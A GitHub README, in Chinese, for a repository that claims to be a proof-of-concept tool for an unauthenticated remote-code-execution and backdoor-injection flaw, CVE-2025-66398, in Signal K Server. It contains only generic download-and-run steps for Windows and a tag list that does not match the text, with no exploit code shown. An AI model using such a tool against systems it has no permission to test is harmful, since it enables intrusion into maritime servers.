showy-headteacher114/cve-2025-66398
GitHub: showy-headteacher114/cve-2025-66398
针对 Signal K Server 的 CVE-2025-66398 远程代码执行漏洞概念验证工具,演示未认证攻击者如何注入后门并执行任意命令。
Stars: 0 | Forks: 0
# ⚠️ cve-2025-66398 - 简单的 RCE 概念验证工具
[](https://github.com/showy-headteacher114/cve-2025-66398)
## ⚙️ 关于此工具
本项目演示了 Signal K Server 2.18.0 及更早版本中的远程代码执行 (RCE) 漏洞。该概念验证 展示了攻击者如何在易受攻击的设备上运行命令。
此工具专为安全测试人员、系统管理员或任何对了解此安全问题感兴趣的人设计。运行它不需要具备编程技能,但掌握基本的计算机导航知识会有所帮助。
## 🖥️ 系统要求
- Windows 10 或更高版本
- 至少 2 GB 的可用 RAM
- 100 MB 可用磁盘空间
- 用于下载文件的互联网连接
- 不需要管理员权限
## 📥 如何下载和安装
点击下面的按钮访问项目页面并下载文件。
[](https://github.com/showy-headteacher114/cve-2025-66398)
### 步骤 1:访问下载页面
访问上面的链接。您将在 GitHub 页面上看到文件和文件夹列表。
### 步骤 2:下载 ZIP 文件
在页面右上角附近寻找绿色的 **Code** 按钮。点击它并选择 **Download ZIP**。
### 步骤 3:解压文件
- 在您的 Downloads 文件夹中找到下载的 ZIP 文件。
- 右键点击 ZIP 文件并选择 **Extract All**(全部解压)。
- 选择您希望文件存放的文件夹,然后点击 **Extract**(解压)。
### 步骤 4:定位应用程序
打开解压后的文件夹。您应该会看到与项目相关的文件,例如脚本和文档。
## ▶️ 如何在 Windows 上运行该工具
该项目使用 Python 和 Go 编写的脚本。要运行该工具,您将使用一个简单的命令提示符窗口。
### 步骤 1:打开命令提示符
- 在键盘上按 `Win + R`。
- 输入 `cmd` 并按回车键。
### 步骤 2:导航到文件夹
输入此命令,将 `path\to\folder` 替换为您解压后的文件夹路径:
```
cd path\to\folder
```
按回车键。
### 步骤 3:运行脚本
您可能会找到一个名为 `run.bat` 或 `start.bat` 的脚本。如果是这样,输入其名称并按回车键。例如:
```
run.bat
```
如果没有 BAT 文件,请查找以 `.py` 结尾的 Python 脚本。您需要在 PC 上安装 Python(请参阅下一节)。
输入此命令以运行:
```
python scriptname.py
```
将 `scriptname.py` 替换为实际的文件名。
## 🐍 安装 Python(如果需要)
如果您收到一条错误消息提示无法识别 Python,则需要安装 Python。
### 步骤 1:下载 Python
访问 Python 官方网站:
https://www.python.org/downloads/windows/
点击最新的 Windows 安装程序并下载。
### 步骤 2:安装 Python
- 运行下载的安装程序。
- 在点击 **Install Now**(立即安装)之前,勾选显示 **Add Python to PATH**(将 Python 添加到 PATH)的复选框。
- 等待安装完成。
### 步骤 3:验证 Python 安装
打开一个新的命令提示符窗口并输入:
```
python --version
```
它应该显示已安装的 Python 版本。
## 🚨 安全运行工具
此工具仅用于测试和了解特定漏洞。请在安全的环境中使用它,例如测试网络或隔离的机器。
切勿针对您不拥有或未获得测试许可的系统运行它。
## 🔍 工具工作原理
该工具扫描运行 Signal K Server 2.18.0 或更早版本的设备。它尝试发送利用该漏洞的命令,并检查目标是否执行了这些命令。
这使得安全专业人员能够确认其系统是否存在漏洞,并采取措施进行更新或保护。
## 💡 故障排除
- 如果工具无法启动,请检查您在命令提示符中是否位于正确的文件夹。
- 确保已安装 Python 并将其添加到您的系统 PATH 中。
- 关闭可能阻止网络访问的其他应用程序。
- 如果遇到权限错误,请以管理员身份运行命令提示符。
- 确保目标设备在网络上是可达的。
## 📄 其他资源
有关 CVE-2025-66398 漏洞的更多信息,请在安全数据库或 GitHub 上搜索相关研究。
## 🔗 下载链接
访问此页面下载工具文件:
https://github.com/showy-headteacher114/cve-2025-66398
标签:CISA项目, CVE-2025-66398, EVTX分析, Go, IoT安全, maritime systems, PoC, Python, RCE, Ruby工具, Signal K Server, Windows工具, 后门注入, 无后门, 日志审计, 暴力破解, 未授权访问, 概念验证, 海事系统, 漏洞分析, 漏洞复现, 编程工具, 网络安全, 路径探测, 远程代码执行, 逆向工具, 隐私保护